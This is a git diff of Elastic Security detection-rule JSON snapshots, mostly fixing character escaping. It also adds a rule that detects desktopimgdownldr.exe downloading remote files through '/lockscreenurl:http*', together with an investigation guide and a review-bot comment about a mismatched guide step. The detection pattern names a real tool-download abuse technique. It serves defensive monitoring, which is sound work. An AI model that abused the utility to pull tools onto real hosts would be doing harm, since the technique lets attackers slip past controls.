However, they can also abuse signed utilities to drop these files.\n\nThe `Desktopimgdownldr.exe` utility is used to to configure lockscreen/desktop image, and can be abused with the `lockscreenurl` argument to download remote files and tools, this rule looks for this behavior.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check the reputation of the domain or IP address used to host the downloaded file or if the user downloaded the file from an internal system.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - 
Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unusual but can be done by administrators. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n- Analysts can dismiss the alert if the downloaded file is a legitimate image.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"desktopimgdownldr.exe\" or process.pe.original_file_name == \"desktopimgdownldr.exe\") and\n process.args : \"/lockscreenurl:http*\"\n", "references": [ "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/" 
@@ -58,7 +58,7 @@
 ],
 "risk_score": 47,
 "rule_id": "15c0b7a7-9c34-4869-b25b-fa6518414899",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -71,7 +71,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_109.json b/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_109.json
new file mode 100644
index 00000000000..0ad9b7b40fa
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_109.json
@@ -0,0 +1,95 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "Identifies the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.",
+ "from": "now-9m",
+ "index": [
+ "winlogbeat-*",
+ "logs-endpoint.events.*",
+ "logs-windows.*",
+ "endgame-*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "Remote File Download via Desktopimgdownldr Utility",
+ "note": "## Triage and analysis\n\n### Investigating Remote File Download via Desktopimgdownldr Utility\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `Desktopimgdownldr.exe` utility is used to to configure lockscreen/desktop image, and can be abused with the `lockscreenurl` argument to download remote files and tools, this rule looks for this behavior.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses the [Investigate Markdown Plugin](https://www.elastic.co/guide/en/security/master/interactive-investigation-guides.html) introduced in Elastic Stack version 8.8.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - !{investigate{\"label\":\"Alerts associated with the user in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"user.id\",\"queryType\":\"phrase\",\"value\":\"{{user.id}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n - !{investigate{\"label\":\"Alerts associated with the host in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"host.name\",\"queryType\":\"phrase\",\"value\":\"{{host.name}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check the reputation of the domain or IP address used to host the downloaded file or if the user downloaded the file from an internal system.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - !{investigate{\"label\":\"Investigate the Subject Process 
Network Events\",\"providers\":[[{\"excluded\":false,\"field\":\"process.entity_id\",\"queryType\":\"phrase\",\"value\":\"{{process.entity_id}}\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"event.category\",\"queryType\":\"phrase\",\"value\":\"network\",\"valueType\":\"string\"}]]}}\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. 
Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unusual but can be done by administrators. Benign true positives (B-TPs) can be added as exceptions if necessary.\n- Analysts can dismiss the alert if the downloaded file is a legitimate image.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n",
+ "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"desktopimgdownldr.exe\" or process.pe.original_file_name == \"desktopimgdownldr.exe\") and\n process.args : \"/lockscreenurl:http*\"\n",
+ "references": [
+ "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/"
+ ],
+ "related_integrations": [
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ },
+ {
+ "package": "windows",
+ "version": "^1.5.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.pe.original_file_name",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "15c0b7a7-9c34-4869-b25b-fa6518414899",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "severity": "medium",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Command and Control",
+ "Resources: 
Investigation Guide",
+ "Data Source: Elastic Endgame",
+ "Data Source: Elastic Defend"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0011",
+ "name": "Command and Control",
+ "reference": "https://attack.mitre.org/tactics/TA0011/"
+ },
+ "technique": [
+ {
+ "id": "T1105",
+ "name": "Ingress Tool Transfer",
+ "reference": "https://attack.mitre.org/techniques/T1105/"
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "eql",
+ "version": 109
+ },
+ "id": "15c0b7a7-9c34-4869-b25b-fa6518414899_109",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/15dacaa0-5b90-466b-acab-63435a59701a_102.json b/packages/security_detection_engine/kibana/security_rule/15dacaa0-5b90-466b-acab-63435a59701a_102.json
index b609e48536d..604bc9de087 100644
--- a/packages/security_detection_engine/kibana/security_rule/15dacaa0-5b90-466b-acab-63435a59701a_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/15dacaa0-5b90-466b-acab-63435a59701a_102.json
@@ -54,7 +54,7 @@
 ],
 "risk_score": 21,
 "rule_id": "15dacaa0-5b90-466b-acab-63435a59701a",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Elastic",
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
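Review bot: The investigation guide in the new `_109` snapshot tells analysts to search for login events `to the target host after the registry modification`, but this rule fires on a process start of `desktopimgdownldr.exe` and references no registry key, so that step reads as a carry-over from a registry-based rule; `after the download` (or `after the alert`) would match what the query actually detects. The same paragraph has a doubled word in `is used to to configure` and a comma splice that would read better as `...download remote files and tools. This rule looks for this behavior.` The identical wording sits in the `_108` snapshot changed in the hunks above; since the numbered snapshots appear to be generated from the rule source rather than hand-edited, the fix presumably belongs upstream and would land in the next snapshot.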
diff --git a/packages/security_detection_engine/kibana/security_rule/15dacaa0-5b90-466b-acab-63435a59701a_103.json b/packages/security_detection_engine/kibana/security_rule/15dacaa0-5b90-466b-acab-63435a59701a_103.json
index 8e61d73154e..cc7971c3af1 100644
--- a/packages/security_detection_engine/kibana/security_rule/15dacaa0-5b90-466b-acab-63435a59701a_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/15dacaa0-5b90-466b-acab-63435a59701a_103.json
@@ -54,7 +54,7 @@
 ],
 "risk_score": 21,
 "rule_id": "15dacaa0-5b90-466b-acab-63435a59701a",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/15dacaa0-5b90-466b-acab-63435a59701a_104.json b/packages/security_detection_engine/kibana/security_rule/15dacaa0-5b90-466b-acab-63435a59701a_104.json
index e174afabef2..7c673c7d54e 100644
--- a/packages/security_detection_engine/kibana/security_rule/15dacaa0-5b90-466b-acab-63435a59701a_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/15dacaa0-5b90-466b-acab-63435a59701a_104.json
@@ -54,7 +54,7 @@
 ],
 "risk_score": 21,
 "rule_id": "15dacaa0-5b90-466b-acab-63435a59701a",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/15dacaa0-5b90-466b-acab-63435a59701a_105.json b/packages/security_detection_engine/kibana/security_rule/15dacaa0-5b90-466b-acab-63435a59701a_105.json
index 273f320ce99..c346429ca05 100644
--- a/packages/security_detection_engine/kibana/security_rule/15dacaa0-5b90-466b-acab-63435a59701a_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/15dacaa0-5b90-466b-acab-63435a59701a_105.json
@@ -53,7 +53,7 @@
 ],
 "risk_score": 21,
 "rule_id": "15dacaa0-5b90-466b-acab-63435a59701a",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/15dacaa0-5b90-466b-acab-63435a59701a_106.json b/packages/security_detection_engine/kibana/security_rule/15dacaa0-5b90-466b-acab-63435a59701a_106.json
index 4864404ec23..3fae086f8a6 100644
--- a/packages/security_detection_engine/kibana/security_rule/15dacaa0-5b90-466b-acab-63435a59701a_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/15dacaa0-5b90-466b-acab-63435a59701a_106.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/166727ab-6768-4e26-b80c-948b228ffc06_2.json b/packages/security_detection_engine/kibana/security_rule/166727ab-6768-4e26-b80c-948b228ffc06_2.json
index 6eb782093d8..0d2c9d98004 100644
--- a/packages/security_detection_engine/kibana/security_rule/166727ab-6768-4e26-b80c-948b228ffc06_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/166727ab-6768-4e26-b80c-948b228ffc06_2.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/166727ab-6768-4e26-b80c-948b228ffc06_3.json b/packages/security_detection_engine/kibana/security_rule/166727ab-6768-4e26-b80c-948b228ffc06_3.json
index ac29e70f6b8..38bc0547fbd 100644
--- a/packages/security_detection_engine/kibana/security_rule/166727ab-6768-4e26-b80c-948b228ffc06_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/166727ab-6768-4e26-b80c-948b228ffc06_3.json
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/16904215-2c95-4ac8-bf5c-12354e047192_102.json b/packages/security_detection_engine/kibana/security_rule/16904215-2c95-4ac8-bf5c-12354e047192_102.json
index 94fd8abeb31..c9eb0003d55 100644
--- a/packages/security_detection_engine/kibana/security_rule/16904215-2c95-4ac8-bf5c-12354e047192_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/16904215-2c95-4ac8-bf5c-12354e047192_102.json
@@ -57,7 +57,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
@@ -79,7 +79,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/16904215-2c95-4ac8-bf5c-12354e047192_103.json b/packages/security_detection_engine/kibana/security_rule/16904215-2c95-4ac8-bf5c-12354e047192_103.json
index 22bfe1983d9..8909bd45312 100644
--- a/packages/security_detection_engine/kibana/security_rule/16904215-2c95-4ac8-bf5c-12354e047192_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/16904215-2c95-4ac8-bf5c-12354e047192_103.json
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
@@ -78,7 +78,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/16904215-2c95-4ac8-bf5c-12354e047192_104.json b/packages/security_detection_engine/kibana/security_rule/16904215-2c95-4ac8-bf5c-12354e047192_104.json
index e0f2fac7b95..d1fed02a889 100644
--- a/packages/security_detection_engine/kibana/security_rule/16904215-2c95-4ac8-bf5c-12354e047192_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/16904215-2c95-4ac8-bf5c-12354e047192_104.json
@@ -57,7 +57,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
@@ -79,7 +79,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/16904215-2c95-4ac8-bf5c-12354e047192_105.json b/packages/security_detection_engine/kibana/security_rule/16904215-2c95-4ac8-bf5c-12354e047192_105.json
index c5d43f0d749..448098eaf5d 100644
--- a/packages/security_detection_engine/kibana/security_rule/16904215-2c95-4ac8-bf5c-12354e047192_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/16904215-2c95-4ac8-bf5c-12354e047192_105.json
@@ -57,7 +57,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
@@ -79,7 +79,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/169f3a93-efc7-4df2-94d6-0d9438c310d1_102.json b/packages/security_detection_engine/kibana/security_rule/169f3a93-efc7-4df2-94d6-0d9438c310d1_102.json
index 99febfa5ff9..ed3227f7262 100644
--- a/packages/security_detection_engine/kibana/security_rule/169f3a93-efc7-4df2-94d6-0d9438c310d1_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/169f3a93-efc7-4df2-94d6-0d9438c310d1_102.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/169f3a93-efc7-4df2-94d6-0d9438c310d1_103.json b/packages/security_detection_engine/kibana/security_rule/169f3a93-efc7-4df2-94d6-0d9438c310d1_103.json
index 0e6154e1518..70ea0ed4620 100644
--- a/packages/security_detection_engine/kibana/security_rule/169f3a93-efc7-4df2-94d6-0d9438c310d1_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/169f3a93-efc7-4df2-94d6-0d9438c310d1_103.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/169f3a93-efc7-4df2-94d6-0d9438c310d1_104.json b/packages/security_detection_engine/kibana/security_rule/169f3a93-efc7-4df2-94d6-0d9438c310d1_104.json
index 9bc5e6e2209..5d076aa2b40 100644
--- a/packages/security_detection_engine/kibana/security_rule/169f3a93-efc7-4df2-94d6-0d9438c310d1_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/169f3a93-efc7-4df2-94d6-0d9438c310d1_104.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/169f3a93-efc7-4df2-94d6-0d9438c310d1_205.json b/packages/security_detection_engine/kibana/security_rule/169f3a93-efc7-4df2-94d6-0d9438c310d1_205.json
index 26798357141..ff877a9ec03 100644
--- a/packages/security_detection_engine/kibana/security_rule/169f3a93-efc7-4df2-94d6-0d9438c310d1_205.json
+++ b/packages/security_detection_engine/kibana/security_rule/169f3a93-efc7-4df2-94d6-0d9438c310d1_205.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_104.json b/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_104.json
index adec25b5906..25a7dec5b36 100644
--- a/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_104.json
@@ -57,7 +57,7 @@
 ],
 "risk_score": 47,
 "rule_id": "16a52c14-7883-47af-8745-9357803f0d4c",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_105.json b/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_105.json
index e38da2991d5..6e728158246 100644
--- a/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_105.json
@@ -57,7 +57,7 @@
 ],
 "risk_score": 47,
 "rule_id": "16a52c14-7883-47af-8745-9357803f0d4c",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
